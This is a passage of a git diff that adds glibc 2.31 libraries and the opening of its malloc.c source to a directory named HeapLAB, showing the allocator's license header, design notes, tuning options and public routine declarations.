+   [see ftp://g.oswego.edu/pub/misc/malloc.c for the history of dlmalloc]
+
+ */
+/*
+ * Local variables:
+ * c-basic-offset: 2
+ * End:
+ */
diff --git a/HeapLAB/.glibc/glibc_2.31/ld-2.31.so b/HeapLAB/.glibc/glibc_2.31/ld-2.31.so
new file mode 100755
index 0000000..2d5c9c2
Binary files /dev/null and b/HeapLAB/.glibc/glibc_2.31/ld-2.31.so differ
diff --git a/HeapLAB/.glibc/glibc_2.31/ld.so.2 b/HeapLAB/.glibc/glibc_2.31/ld.so.2
new file mode 120000
index 0000000..2e1e932
--- /dev/null
+++ b/HeapLAB/.glibc/glibc_2.31/ld.so.2
@@ -0,0 +1 @@
+ld-2.31.so
\ No newline at end of file
diff --git a/HeapLAB/.glibc/glibc_2.31/libc-2.31.so b/HeapLAB/.glibc/glibc_2.31/libc-2.31.so
new file mode 100755
index 0000000..d90c38d
Binary files /dev/null and b/HeapLAB/.glibc/glibc_2.31/libc-2.31.so differ
diff --git a/HeapLAB/.glibc/glibc_2.31/libc.so.6 b/HeapLAB/.glibc/glibc_2.31/libc.so.6
new file mode 120000
index 0000000..524d6c6
--- /dev/null
+++ b/HeapLAB/.glibc/glibc_2.31/libc.so.6
@@ -0,0 +1 @@
+libc-2.31.so
\ No newline at end of file
diff --git a/HeapLAB/.glibc/glibc_2.31/malloc/malloc.c b/HeapLAB/.glibc/glibc_2.31/malloc/malloc.c
new file mode 100644
index 0000000..f7cd29b
--- /dev/null
+++ b/HeapLAB/.glibc/glibc_2.31/malloc/malloc.c
@@ -0,0 +1,5610 @@
+/* Malloc implementation for multiple threads without lock contention.
+   Copyright (C) 1996-2020 Free Software Foundation, Inc.
+   This file is part of the GNU C Library.
+   Contributed by Wolfram Gloger <wg@malloc.de>
+   and Doug Lea <dl@cs.oswego.edu>, 2001.
+
+   The GNU C Library is free software; you can redistribute it and/or
+   modify it under the terms of the GNU Lesser General Public License as
+   published by the Free Software Foundation; either version 2.1 of the
+   License, or (at your option) any later version.
+
+   The GNU C Library is distributed in the hope that it will be useful,
+   but WITHOUT ANY WARRANTY; without even the implied warranty of
+   MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
+   Lesser General Public License for more details.
+
+   You should have received a copy of the GNU Lesser General Public
+   License along with the GNU C Library; see the file COPYING.LIB.  If
+   not, see <https://www.gnu.org/licenses/>.  */
+
+/*
+  This is a version (aka ptmalloc2) of malloc/free/realloc written by
+  Doug Lea and adapted to multiple threads/arenas by Wolfram Gloger.
+
+  There have been substantial changes made after the integration into
+  glibc in all parts of the code.  Do not look for much commonality
+  with the ptmalloc2 version.
+
+* Version ptmalloc2-20011215
+  based on:
+  VERSION 2.7.0 Sun Mar 11 14:14:06 2001  Doug Lea  (dl at gee)
+
+* Quickstart
+
+  In order to compile this implementation, a Makefile is provided with
+  the ptmalloc2 distribution, which has pre-defined targets for some
+  popular systems (e.g. "make posix" for Posix threads).  All that is
+  typically required with regard to compiler flags is the selection of
+  the thread package via defining one out of USE_PTHREADS, USE_THR or
+  USE_SPROC.  Check the thread-m.h file for what effects this has.
+  Many/most systems will additionally require USE_TSD_DATA_HACK to be
+  defined, so this is the default for "make posix".
+
+* Why use this malloc?
+
+  This is not the fastest, most space-conserving, most portable, or
+  most tunable malloc ever written. However it is among the fastest
+  while also being among the most space-conserving, portable and tunable.
+  Consistent balance across these factors results in a good general-purpose
+  allocator for malloc-intensive programs.
+
+  The main properties of the algorithms are:
+  * For large (>= 512 bytes) requests, it is a pure best-fit allocator,
+    with ties normally decided via FIFO (i.e. least recently used).
+  * For small (<= 64 bytes by default) requests, it is a caching
+    allocator, that maintains pools of quickly recycled chunks.
+  * In between, and for combinations of large and small requests, it does
+    the best it can trying to meet both goals at once.
+  * For very large requests (>= 128KB by default), it relies on system
+    memory mapping facilities, if supported.
+
+  For a longer but slightly out of date high-level description, see
+     http://gee.cs.oswego.edu/dl/html/malloc.html
+
+  You may already by default be using a C library containing a malloc
+  that is  based on some version of this malloc (for example in
+  linux). You might still want to use the one in this file in order to
+  customize settings or to avoid overheads associated with library
+  versions.
+
+* Contents, described in more detail in "description of public routines" below.
+
+  Standard (ANSI/SVID/...)  functions:
+    malloc(size_t n);
+    calloc(size_t n_elements, size_t element_size);
+    free(void* p);
+    realloc(void* p, size_t n);
+    memalign(size_t alignment, size_t n);
+    valloc(size_t n);
+    mallinfo()
+    mallopt(int parameter_number, int parameter_value)
+
+  Additional functions:
+    independent_calloc(size_t n_elements, size_t size, void* chunks[]);
+    independent_comalloc(size_t n_elements, size_t sizes[], void* chunks[]);
+    pvalloc(size_t n);
+    malloc_trim(size_t pad);
+    malloc_usable_size(void* p);
+    malloc_stats();
+
+* Vital statistics:
+
+  Supported pointer representation:       4 or 8 bytes
+  Supported size_t  representation:       4 or 8 bytes
+       Note that size_t is allowed to be 4 bytes even if pointers are 8.
+       You can adjust this by defining INTERNAL_SIZE_T
+
+  Alignment:                              2 * sizeof(size_t) (default)
+       (i.e., 8 byte alignment with 4byte size_t). This suffices for
+       nearly all current machines and C compilers. However, you can
+       define MALLOC_ALIGNMENT to be wider than this if necessary.
+
+  Minimum overhead per allocated chunk:   4 or 8 bytes
+       Each malloced chunk has a hidden word of overhead holding size
+       and status information.
+
+  Minimum allocated size: 4-byte ptrs:  16 bytes    (including 4 overhead)
+			  8-byte ptrs:  24/32 bytes (including, 4/8 overhead)
+
+       When a chunk is freed, 12 (for 4byte ptrs) or 20 (for 8 byte
+       ptrs but 4 byte size) or 24 (for 8/8) additional bytes are
+       needed; 4 (8) for a trailing size field and 8 (16) bytes for
+       free list pointers. Thus, the minimum allocatable size is
+       16/24/32 bytes.
+
+       Even a request for zero bytes (i.e., malloc(0)) returns a
+       pointer to something of the minimum allocatable size.
+
+       The maximum overhead wastage (i.e., number of extra bytes
+       allocated than were requested in malloc) is less than or equal
+       to the minimum size, except for requests >= mmap_threshold that
+       are serviced via mmap(), where the worst case wastage is 2 *
+       sizeof(size_t) bytes plus the remainder from a system page (the
+       minimal mmap unit); typically 4096 or 8192 bytes.
+
+  Maximum allocated size:  4-byte size_t: 2^32 minus about two pages
+			   8-byte size_t: 2^64 minus about two pages
+
+       It is assumed that (possibly signed) size_t values suffice to
+       represent chunk sizes. `Possibly signed' is due to the fact
+       that `size_t' may be defined on a system as either a signed or
+       an unsigned type. The ISO C standard says that it must be
+       unsigned, but a few systems are known not to adhere to this.
+       Additionally, even when size_t is unsigned, sbrk (which is by
+       default used to obtain memory from system) accepts signed
+       arguments, and may not be able to handle size_t-wide arguments
+       with negative sign bit.  Generally, values that would
+       appear as negative after accounting for overhead and alignment
+       are supported only via mmap(), which does not have this
+       limitation.
+
+       Requests for sizes outside the allowed range will perform an optional
+       failure action and then return null. (Requests may also
+       also fail because a system is out of memory.)
+
+  Thread-safety: thread-safe
+
+  Compliance: I believe it is compliant with the 1997 Single Unix Specification
+       Also SVID/XPG, ANSI C, and probably others as well.
+
+* Synopsis of compile-time options:
+
+    People have reported using previous versions of this malloc on all
+    versions of Unix, sometimes by tweaking some of the defines
+    below. It has been tested most extensively on Solaris and Linux.
+    People also report using it in stand-alone embedded systems.
+
+    The implementation is in straight, hand-tuned ANSI C.  It is not
+    at all modular. (Sorry!)  It uses a lot of macros.  To be at all
+    usable, this code should be compiled using an optimizing compiler
+    (for example gcc -O3) that can simplify expressions and control
+    paths. (FAQ: some macros import variables as arguments rather than
+    declare locals because people reported that some debuggers
+    otherwise get confused.)
+
+    OPTION                     DEFAULT VALUE
+
+    Compilation Environment options:
+
+    HAVE_MREMAP                0
+
+    Changing default word sizes:
+
+    INTERNAL_SIZE_T            size_t
+
+    Configuration and functionality options:
+
+    USE_PUBLIC_MALLOC_WRAPPERS NOT defined
+    USE_MALLOC_LOCK            NOT defined
+    MALLOC_DEBUG               NOT defined
+    REALLOC_ZERO_BYTES_FREES   1
+    TRIM_FASTBINS              0
+
+    Options for customizing MORECORE:
+
+    MORECORE                   sbrk
+    MORECORE_FAILURE           -1
+    MORECORE_CONTIGUOUS        1
+    MORECORE_CANNOT_TRIM       NOT defined
+    MORECORE_CLEARS            1
+    MMAP_AS_MORECORE_SIZE      (1024 * 1024)
+
+    Tuning options that are also dynamically changeable via mallopt:
+
+    DEFAULT_MXFAST             64 (for 32bit), 128 (for 64bit)
+    DEFAULT_TRIM_THRESHOLD     128 * 1024
+    DEFAULT_TOP_PAD            0
+    DEFAULT_MMAP_THRESHOLD     128 * 1024
+    DEFAULT_MMAP_MAX           65536
+
+    There are several other #defined constants and macros that you
+    probably don't want to touch unless you are extending or adapting malloc.  */
+
+/*
+  void* is the pointer type that malloc should say it returns
+*/
+
+#ifndef void
+#define void      void
+#endif /*void*/
+
+#include <stddef.h>   /* for size_t */
+#include <stdlib.h>   /* for getenv(), abort() */
+#include <unistd.h>   /* for __libc_enable_secure */
+
+#include <atomic.h>
+#include <_itoa.h>
+#include <bits/wordsize.h>
+#include <sys/sysinfo.h>
+
+#include <ldsodefs.h>
+
+#include <unistd.h>
+#include <stdio.h>    /* needed for malloc_stats */
+#include <errno.h>
+#include <assert.h>
+
+#include <shlib-compat.h>
+
+/* For uintptr_t.  */
+#include <stdint.h>
+
+/* For va_arg, va_start, va_end.  */
+#include <stdarg.h>
+
+/* For MIN, MAX, powerof2.  */
+#include <sys/param.h>
+
+/* For ALIGN_UP et. al.  */
+#include <libc-pointer-arith.h>
+
+/* For DIAG_PUSH/POP_NEEDS_COMMENT et al.  */
+#include <libc-diag.h>
+
+#include <malloc/malloc-internal.h>
+
+/* For SINGLE_THREAD_P.  */
+#include <sysdep-cancel.h>
+
+/*
+  Debugging:
+
+  Because freed chunks may be overwritten with bookkeeping fields, this
+  malloc will often die when freed memory is overwritten by user
+  programs.  This can be very effective (albeit in an annoying way)
+  in helping track down dangling pointers.
+
+  If you compile with -DMALLOC_DEBUG, a number of assertion checks are
+  enabled that will catch more memory errors. You probably won't be
+  able to make much sense of the actual assertion errors, but they
+  should help you locate incorrectly overwritten memory.  The checking
+  is fairly extensive, and will slow down execution
+  noticeably. Calling malloc_stats or mallinfo with MALLOC_DEBUG set
+  will attempt to check every non-mmapped allocated and free chunk in
+  the course of computing the summmaries. (By nature, mmapped regions
+  cannot be checked very much automatically.)
+
+  Setting MALLOC_DEBUG may also be helpful if you are trying to modify
+  this code. The assertions in the check routines spell out in more
+  detail the assumptions and invariants underlying the algorithms.
+
+  Setting MALLOC_DEBUG does NOT provide an automated mechanism for
+  checking that all accesses to malloced memory stay within their
+  bounds. However, there are several add-ons and adaptations of this
+  or other mallocs available that do this.
+*/
+
+#ifndef MALLOC_DEBUG
+#define MALLOC_DEBUG 0
+#endif
+
+#ifndef NDEBUG
+# define __assert_fail(assertion, file, line, function)			\
+	 __malloc_assert(assertion, file, line, function)
+
+extern const char *__progname;
+
+static void
+__malloc_assert (const char *assertion, const char *file, unsigned int line,
+		 const char *function)
+{
+  (void) __fxprintf (NULL, "%s%s%s:%u: %s%sAssertion `%s' failed.\n",
+		     __progname, __progname[0] ? ": " : "",
+		     file, line,
+		     function ? function : "", function ? ": " : "",
+		     assertion);
+  fflush (stderr);
+  abort ();
+}
+#endif
+
+#if USE_TCACHE
+/* We want 64 entries.  This is an arbitrary limit, which tunables can reduce.  */
+# define TCACHE_MAX_BINS		64
+# define MAX_TCACHE_SIZE	tidx2usize (TCACHE_MAX_BINS-1)
+
+/* Only used to pre-fill the tunables.  */
+# define tidx2usize(idx)	(((size_t) idx) * MALLOC_ALIGNMENT + MINSIZE - SIZE_SZ)
+
+/* When "x" is from chunksize().  */
+# define csize2tidx(x) (((x) - MINSIZE + MALLOC_ALIGNMENT - 1) / MALLOC_ALIGNMENT)
+/* When "x" is a user-provided size.  */
+# define usize2tidx(x) csize2tidx (request2size (x))
+
+/* With rounding and alignment, the bins are...
+   idx 0   bytes 0..24 (64-bit) or 0..12 (32-bit)
+   idx 1   bytes 25..40 or 13..20
+   idx 2   bytes 41..56 or 21..28
+   etc.  */
+
+/* This is another arbitrary limit, which tunables can change.  Each
+   tcache bin will hold at most this number of chunks.  */
+# define TCACHE_FILL_COUNT 7
+
+/* Maximum chunks in tcache bins for tunables.  This value must fit the range
+   of tcache->counts[] entries, else they may overflow.  */
+# define MAX_TCACHE_COUNT UINT16_MAX
+#endif
+
+
+/*
+  REALLOC_ZERO_BYTES_FREES should be set if a call to
+  realloc with zero bytes should be the same as a call to free.
+  This is required by the C standard. Otherwise, since this malloc
+  returns a unique pointer for malloc(0), so does realloc(p, 0).
+*/
+
+#ifndef REALLOC_ZERO_BYTES_FREES
+#define REALLOC_ZERO_BYTES_FREES 1
+#endif
+
+/*
+  TRIM_FASTBINS controls whether free() of a very small chunk can
+  immediately lead to trimming. Setting to true (1) can reduce memory
+  footprint, but will almost always slow down programs that use a lot
+  of small chunks.
+
+  Define this only if you are willing to give up some speed to more
+  aggressively reduce system-level memory footprint when releasing
+  memory in programs that use many small chunks.  You can get
+  essentially the same effect by setting MXFAST to 0, but this can
+  lead to even greater slowdowns in programs using many small chunks.
+  TRIM_FASTBINS is an in-between compile-time option, that disables
+  only those chunks bordering topmost memory from being placed in
+  fastbins.
+*/
+
+#ifndef TRIM_FASTBINS
+#define TRIM_FASTBINS  0
+#endif
+
+
+/* Definition for getting more memory from the OS.  */
+#define MORECORE         (*__morecore)
+#define MORECORE_FAILURE 0
+void * __default_morecore (ptrdiff_t);
+void *(*__morecore)(ptrdiff_t) = __default_morecore;
+
+
+#include <string.h>
+
+/*
+  MORECORE-related declarations. By default, rely on sbrk
+*/
+
+
+/*
+  MORECORE is the name of the routine to call to obtain more memory
+  from the system.  See below for general guidance on writing
+  alternative MORECORE functions, as well as a version for WIN32 and a
+  sample version for pre-OSX macos.
+*/
+
+#ifndef MORECORE
+#define MORECORE sbrk
+#endif
+
+/*
+  MORECORE_FAILURE is the value returned upon failure of MORECORE
+  as well as mmap. Since it cannot be an otherwise valid memory address,
+  and must reflect values of standard sys calls, you probably ought not
+  try to redefine it.
+*/
+
+#ifndef MORECORE_FAILURE
+#define MORECORE_FAILURE (-1)
+#endif
+
+/*
+  If MORECORE_CONTIGUOUS is true, take advantage of fact that
+  consecutive calls to MORECORE with positive arguments always return
+  contiguous increasing addresses.  This is true of unix sbrk.  Even
+  if not defined, when regions happen to be contiguous, malloc will
+  permit allocations spanning regions obtained from different
+  calls. But defining this when applicable enables some stronger
+  consistency checks and space efficiencies.
+*/
+
+#ifndef MORECORE_CONTIGUOUS
+#define MORECORE_CONTIGUOUS 1
+#endif
+
+/*
+  Define MORECORE_CANNOT_TRIM if your version of MORECORE
+  cannot release space back to the system when given negative
+  arguments. This is generally necessary only if you are using
+  a hand-crafted MORECORE function that cannot handle negative arguments.
+*/
+
+/* #define MORECORE_CANNOT_TRIM */
+
+/*  MORECORE_CLEARS           (default 1)
+     The degree to which the routine mapped to MORECORE zeroes out
+     memory: never (0), only for newly allocated space (1) or always
+     (2).  The distinction between (1) and (2) is necessary because on
+     some systems, if the application first decrements and then
+     increments the break value, the contents of the reallocated space
+     are unspecified.
+ */
+
+#ifndef MORECORE_CLEARS
+# define MORECORE_CLEARS 1
+#endif
+
+
+/*
+   MMAP_AS_MORECORE_SIZE is the minimum mmap size argument to use if
+   sbrk fails, and mmap is used as a backup.  The value must be a
+   multiple of page size.  This backup strategy generally applies only
+   when systems have "holes" in address space, so sbrk cannot perform
+   contiguous expansion, but there is still space available on system.
+   On systems for which this is known to be useful (i.e. most linux
+   kernels), this occurs only when programs allocate huge amounts of
+   memory.  Between this, and the fact that mmap regions tend to be
+   limited, the size should be large, to avoid too many mmap calls and
+   thus avoid running out of kernel resources.  */
+
+#ifndef MMAP_AS_MORECORE_SIZE
+#define MMAP_AS_MORECORE_SIZE (1024 * 1024)
+#endif
+
+/*
+  Define HAVE_MREMAP to make realloc() use mremap() to re-allocate
+  large blocks.
+*/
+
+#ifndef HAVE_MREMAP
+#define HAVE_MREMAP 0
+#endif
+
+/* We may need to support __malloc_initialize_hook for backwards
+   compatibility.  */
+
+#if SHLIB_COMPAT (libc, GLIBC_2_0, GLIBC_2_24)
+# define HAVE_MALLOC_INIT_HOOK 1
+#else
+# define HAVE_MALLOC_INIT_HOOK 0
+#endif
+
+
+/*
+  This version of malloc supports the standard SVID/XPG mallinfo
+  routine that returns a struct containing usage properties and
+  statistics. It should work on any SVID/XPG compliant system that has
+  a /usr/include/malloc.h defining struct mallinfo. (If you'd like to
+  install such a thing yourself, cut out the preliminary declarations
+  as described above and below and save them in a malloc.h file. But
+  there's no compelling reason to bother to do this.)
+
+  The main declaration needed is the mallinfo struct that is returned
+  (by-copy) by mallinfo().  The SVID/XPG malloinfo struct contains a
+  bunch of fields that are not even meaningful in this version of
+  malloc.  These fields are are instead filled by mallinfo() with
+  other numbers that might be of interest.
+*/
+
+
+/* ---------- description of public routines ------------ */
+
+/*
+  malloc(size_t n)
+  Returns a pointer to a newly allocated chunk of at least n bytes, or null
+  if no space is available. Additionally, on failure, errno is
+  set to ENOMEM on ANSI C systems.
+
+  If n is zero, malloc returns a minumum-sized chunk. (The minimum
+  size is 16 bytes on most 32bit systems, and 24 or 32 bytes on 64bit
+  systems.)  On most systems, size_t is an unsigned type, so calls
+  with negative arguments are interpreted as requests for huge amounts
+  of space, which will often fail. The maximum supported value of n
+  differs across systems, but is in all cases less than the maximum
+  representable value of a size_t.
+*/
+void*  __libc_malloc(size_t);
+libc_hidden_proto (__libc_malloc)
+
+/*
+  free(void* p)
+  Releases the chunk of memory pointed to by p, that had been previously
+  allocated using malloc or a related routine such as realloc.
+  It has no effect if p is null. It can have arbitrary (i.e., bad!)
+  effects if p has already been freed.
+
+  Unless disabled (using mallopt), freeing very large spaces will
+  when possible, automatically trigger operations that give
+  back unused memory to the system, thus reducing program footprint.
+*/
+void     __libc_free(void*);
+libc_hidden_proto (__libc_free)
+
+/*
+  calloc(size_t n_elements, size_t element_size);
+  Returns a pointer to n_elements * element_size bytes, with all locations
+  set to zero.
+*/
+void*  __libc_calloc(size_t, size_t);
+
+/*
+  realloc(void* p, size_t n)
+  Returns a pointer to a chunk of size n that contains the same data
+  as does chunk p up to the minimum of (n, p's size) bytes, or null
+  if no space is available.
+
+  The returned pointer may or may not be the same as p. The algorithm
+  prefers extending p when possible, otherwise it employs the
+  equivalent of a malloc-copy-free sequence.
+
+  If p is null, realloc is equivalent to malloc.
+
+  If space is not available, realloc returns null, errno is set (if on
+  ANSI) and p is NOT freed.
+
+  if n is for fewer bytes than already held by p, the newly unused
+  space is lopped off and freed if possible.  Unless the #define
+  REALLOC_ZERO_BYTES_FREES is set, realloc with a size argument of
+  zero (re)allocates a minimum-sized chunk.
+
+  Large chunks that were internally obtained via mmap will always be
+  grown using malloc-copy-free sequences unless the system supports
+  MREMAP (currently only linux).
+
+  The old unix realloc convention of allowing the last-free'd chunk
+  to be used as an argument to realloc is not supported.
+*/
+void*  __libc_realloc(void*, size_t);
+libc_hidden_proto (__libc_realloc)
+
+/*
+  memalign(size_t alignment, size_t n);
+  Returns a pointer to a newly allocated chunk of n bytes, aligned
+  in accord with the alignment argument.
+
+  The alignment argument should be a power of two. If the argument is
+  not a power of two, the nearest greater power is used.
+  8-byte alignment is guaranteed by normal malloc calls, so don't
+  bother calling memalign with an argument of 8 or less.
+
+  Overreliance on memalign is a sure way to fragment space.
+*/
+void*  __libc_memalign(size_t, size_t);
+libc_hidden_proto (__libc_memalign)
+
+/*
+  valloc(size_t n);
+  Equivalent to memalign(pagesize, n), where pagesize is the page
+  size of the system. If the pagesize is unknown, 4096 is used.
+*/
+void*  __libc_valloc(size_t);
+
+
+
+/*
+  mallopt(int parameter_number, int parameter_value)
+  Sets tunable parameters The format is to provide a
+  (parameter-number, parameter-value) pair.  mallopt then sets the
+  corresponding parameter to the argument value if it can (i.e., so
+  long as the value is meaningful), and returns 1 if successful else
+  0.  SVID/XPG/ANSI defines four standard param numbers for mallopt,
+  normally defined in malloc.h.  Only one of these (M_MXFAST) is used
+  in this malloc. The others (M_NLBLKS, M_GRAIN, M_KEEP) don't apply,
+  so setting them has no effect. But this malloc also supports four
+  other options in mallopt. See below for details.  Briefly, supported
+  parameters are as follows (listed defaults are for "typical"
+  configurations).
+
+  Symbol            param #   default    allowed param values
+  M_MXFAST          1         64         0-80  (0 disables fastbins)
+  M_TRIM_THRESHOLD -1         128*1024   any   (-1U disables trimming)
+  M_TOP_PAD        -2         0          any
+  M_MMAP_THRESHOLD -3         128*1024   any   (or 0 if no MMAP support)
+  M_MMAP_MAX       -4         65536      any   (0 disables use of mmap)
+*/
+int      __libc_mallopt(int, int);
+libc_hidden_proto (__libc_mallopt)
+
+
+/*
+  mallinfo()
+  Returns (by copy) a struct containing various summary statistics:
+
+  arena:     current total non-mmapped bytes allocated from system
+  ordblks:   the number of free chunks
+  smblks:    the number of fastbin blocks (i.e., small chunks that
+	       have been freed but not use resused or consolidated)
+  hblks:     current number of mmapped regions
+  hblkhd:    total bytes held in mmapped regions
+  usmblks:   always 0
+  fsmblks:   total bytes held in fastbin blocks
+  uordblks:  current total allocated space (normal or mmapped)
+  fordblks:  total free space
+  keepcost:  the maximum number of bytes that could ideally be released
+	       back to system via malloc_trim. ("ideally" means that
+	       it ignores page restrictions etc.)
+
+  Because these fields are ints, but internal bookkeeping may
+  be kept as longs, the reported values may wrap around zero and
+  thus be inaccurate.
+*/
+struct mallinfo __libc_mallinfo(void);
+
+
+/*
+  pvalloc(size_t n);
+  Equivalent to valloc(minimum-page-that-holds(n)), that is,
+  round up n to nearest pagesize.
+ */
+void*  __libc_pvalloc(size_t);
+
+/*
+  malloc_trim(size_t pad);
+
+  If possible, gives memory back to the system (via negative
+  arguments to sbrk) if there is unused memory at the `high' end of
+  the malloc pool. You can call this after freeing large blocks of
+  memory to potentially reduce the system-level memory requirements
+  of a program. However, it cannot guarantee to reduce memory. Under
+  some allocation patterns, some large free blocks of memory will be
+  locked between two used chunks, so they cannot be given back to
+  the system.
+
+  The `pad' argument to malloc_trim represents the amount of free
+  trailing space to leave untrimmed. If this argument is zero,
+  only the minimum amount of memory to maintain internal data
+  structures will be left (one page or less). Non-zero arguments
+  can be supplied to maintain enough trailing space to service
+  future expected allocations without having to re-obtain memory
+  from the system.
+
+  Malloc_trim returns 1 if it actually released any memory, else 0.
+  On systems that do not support "negative sbrks", it will always
+  return 0.
+*/
+int      __malloc_trim(size_t);
+
+/*
+  malloc_usable_size(void* p);
+
+  Returns the number of bytes you can actually use in
+  an allocated chunk, which may be more than you requested (although
+  often not) due to alignment and minimum size constraints.
+  You can use this many bytes without worrying about
+  overwriting other allocated objects. This is not a particularly great
+  programming practice. malloc_usable_size can be more useful in
+  debugging and assertions, for example:
+
+  p = malloc(n);
+  assert(malloc_usable_size(p) >= 256);
+
+*/
+size_t   __malloc_usable_size(void*);
+
+/*
+  malloc_stats();
+  Prints on stderr the amount of space obtained from the system (both
+  via sbrk and mmap), the maximum amount (which may be more than
+  current if malloc_trim and/or munmap got called), and the current
+  number of bytes allocated via malloc (or realloc, etc) but not yet
+  freed. Note that this is the number of bytes allocated, not the
+  number requested. It will be larger than the number requested
+  because of alignment and bookkeeping overhead. Because it includes
+  alignment wastage as being in use, this figure may be greater than
+  zero even when no user-level chunks are allocated.
+
+  The reported current and maximum system memory can be inaccurate if
+  a program makes other calls to system memory allocation functions
+  (normally sbrk) outside of malloc.
+
+  malloc_stats prints only the most commonly interesting statistics.
+  More information can be obtained by calling mallinfo.
+
+*/
+void     __malloc_stats(void);
+
+/*
+  posix_memalign(void **memptr, size_t alignment, size_t size);
+
+  POSIX wrapper like memalign(), checking for validity of size.
+*/
+int      __posix_memalign(void **, size_t, size_t);
+
+/* mallopt tuning options */
+
+/*
+  M_MXFAST is the maximum request size used for "fastbins", special bins
+  that hold returned chunks without consolidating their spaces. This
+  enables future requests for chunks of the same size to be handled
+  very quickly, but can increase fragmentation, and thus increase the
+  overall memory footprint of a program.
+
+  This malloc manages fastbins very conservatively yet still
+  efficiently, so fragmentation is rarely a problem for values less
+  than or equal to the default.  The maximum supported value of MXFAST
+  is 80. You wouldn't want it any higher than this anyway.  Fastbins
+  are designed especially for use with many small structs, objects or
+  strings -- the default handles structs/objects/arrays with sizes up
+  to 8 4byte fields, or small strings representing words, tokens,
+  etc. Using fastbins for larger objects normally worsens
+  fragmentation without improving speed.
+
+  M_MXFAST is set in REQUEST size units. It is internally used in
+  chunksize units, which adds padding and alignment.  You can reduce
+  M_MXFAST to 0 to disable all use of fastbins.  This causes the malloc
+  algorithm to be a closer approximation of fifo-best-fit in all cases,
+  not just for larger requests, but will generally cause it to be
+  slower.
+*/
+
+
+/* M_MXFAST is a standard SVID/XPG tuning option, usually listed in malloc.h */
+#ifndef M_MXFAST
+#define M_MXFAST            1
+#endif
+
+#ifndef DEFAULT_MXFAST
+#define DEFAULT_MXFAST     (64 * SIZE_SZ / 4)
+#endif
+
+
+/*
+  M_TRIM_THRESHOLD is the maximum amount of unused top-most memory
+  to keep before releasing via malloc_trim in free().
+
+  Automatic trimming is mainly useful in long-lived programs.
+  Because trimming via sbrk can be slow on some systems, and can
+  sometimes be wasteful (in cases where programs immediately
+  afterward allocate more large chunks) the value should be high
+  enough so that your overall system performance would improve by
+  releasing this much memory.
+
+  The trim threshold and the mmap control parameters (see below)
+  can be traded off with one another. Trimming and mmapping are
+  two different ways of releasing unused memory back to the
+  system. Between these two, it is often possible to keep
+  system-level demands of a long-lived program down to a bare
+  minimum. For example, in one test suite of sessions measuring
+  the XF86 X server on Linux, using a trim threshold of 128K and a
+  mmap threshold of 192K led to near-minimal long term resource
+  consumption.
+
+  If you are using this malloc in a long-lived program, it should
+  pay to experiment with these values.  As a rough guide, you
+  might set to a value close to the average size of a process
+  (program) running on your system.  Releasing this much memory
+  would allow such a process to run in memory.  Generally, it's
+  worth it to tune for trimming rather tham memory mapping when a
+  program undergoes phases where several large chunks are
+  allocated and released in ways that can reuse each other's
+  storage, perhaps mixed with phases where there are no such
+  chunks at all.  And in well-behaved long-lived programs,
+  controlling release of large blocks via trimming versus mapping
+  is usually faster.
+
+  However, in most programs, these parameters serve mainly as
+  protection against the system-level effects of carrying around
+  massive amounts of unneeded memory. Since frequent calls to
+  sbrk, mmap, and munmap otherwise degrade performance, the default
+  parameters are set to relatively high values that serve only as
+  safeguards.
+
+  The trim value It must be greater than page size to have any useful
+  effect.  To disable trimming completely, you can set to
+  (unsigned long)(-1)
+
+  Trim settings interact with fastbin (MXFAST) settings: Unless
+  TRIM_FASTBINS is defined, automatic trimming never takes place upon
+  freeing a chunk with size less than or equal to MXFAST. Trimming is
+  instead delayed until subsequent freeing of larger chunks. However,
+  you can still force an attempted trim by calling malloc_trim.
+
+  Also, trimming is not generally possible in cases where
+  the main arena is obtained via mmap.
+
+  Note that the trick some people use of mallocing a huge space and
+  then freeing it at program startup, in an attempt to reserve system
+  memory, doesn't have the intended effect under automatic trimming,
+  since that memory will immediately be returned to the system.
+*/
+
+#define M_TRIM_THRESHOLD       -1
+
+#ifndef DEFAULT_TRIM_THRESHOLD
+#define DEFAULT_TRIM_THRESHOLD (128 * 1024)
+#endif
+
+/*
+  M_TOP_PAD is the amount of extra `padding' space to allocate or
+  retain whenever sbrk is called. It is used in two ways internally:
+
+  * When sbrk is called to extend the top of the arena to satisfy
+  a new malloc request, this much padding is added to the sbrk
+  request.
+
+  * When malloc_trim is called automatically from free(),
+  it is used as the `pad' argument.
+
+  In both cases, the actual amount of padding is rounded
+  so that the end of the arena is always a system page boundary.
+
+  The main reason for using padding is to avoid calling sbrk so
+  often. Having even a small pad greatly reduces the likelihood
+  that nearly every malloc request during program start-up (or
+  after trimming) will invoke sbrk, which needlessly wastes
+  time.
+
+  Automatic rounding-up to page-size units is normally sufficient
+  to avoid measurable overhead, so the default is 0.  However, in
+  systems where sbrk is relatively slow, it can pay to increase
+  this value, at the expense of carrying around more memory than
+  the program needs.
+*/
+
+#define M_TOP_PAD              -2
+
+#ifndef DEFAULT_TOP_PAD
+#define DEFAULT_TOP_PAD        (0)
+#endif
+
+/*
+  MMAP_THRESHOLD_MAX and _MIN are the bounds on the dynamically
+  adjusted MMAP_THRESHOLD.
+*/
+
+#ifndef DEFAULT_MMAP_THRESHOLD_MIN
+#define DEFAULT_MMAP_THRESHOLD_MIN (128 * 1024)
+#endif
+
+#ifndef DEFAULT_MMAP_THRESHOLD_MAX
+  /* For 32-bit platforms we cannot increase the maximum mmap
+     threshold much because it is also the minimum value for the
+     maximum heap size and its alignment.  Going above 512k (i.e., 1M
+     for new heaps) wastes too much address space.  */
+# if __WORDSIZE == 32
+#  define DEFAULT_MMAP_THRESHOLD_MAX (512 * 1024)
+# else
+#  define DEFAULT_MMAP_THRESHOLD_MAX (4 * 1024 * 1024 * sizeof(long))
+# endif
+#endif
+
+/*
+  M_MMAP_THRESHOLD is the request size threshold for using mmap()
+  to service a request. Requests of at least this size that cannot
+  be allocated using already-existing space will be serviced via mmap.
+  (If enough normal freed space already exists it is used instead.)
+
+  Using mmap segregates relatively large chunks of memory so that
+  they can be individually obtained and released from the host
+  system. A request serviced through mmap is never reused by any
+  other request (at least not directly; the system may just so
+  happen to remap successive requests to the same locations).
+
+  Segregating space in this way has the benefits that:
+
+   1. Mmapped space can ALWAYS be individually released back
+      to the system, which helps keep the system level memory
+      demands of a long-lived program low.
+   2. Mapped memory can never become `locked' between
+      other chunks, as can happen with normally allocated chunks, which
+      means that even trimming via malloc_trim would not release them.
+   3. On some systems with "holes" in address spaces, mmap can obtain
+      memory that sbrk cannot.
+
+  However, it has the disadvantages that:
+
+   1. The space cannot be reclaimed, consolidated, and then
+      used to service later requests, as happens with normal chunks.
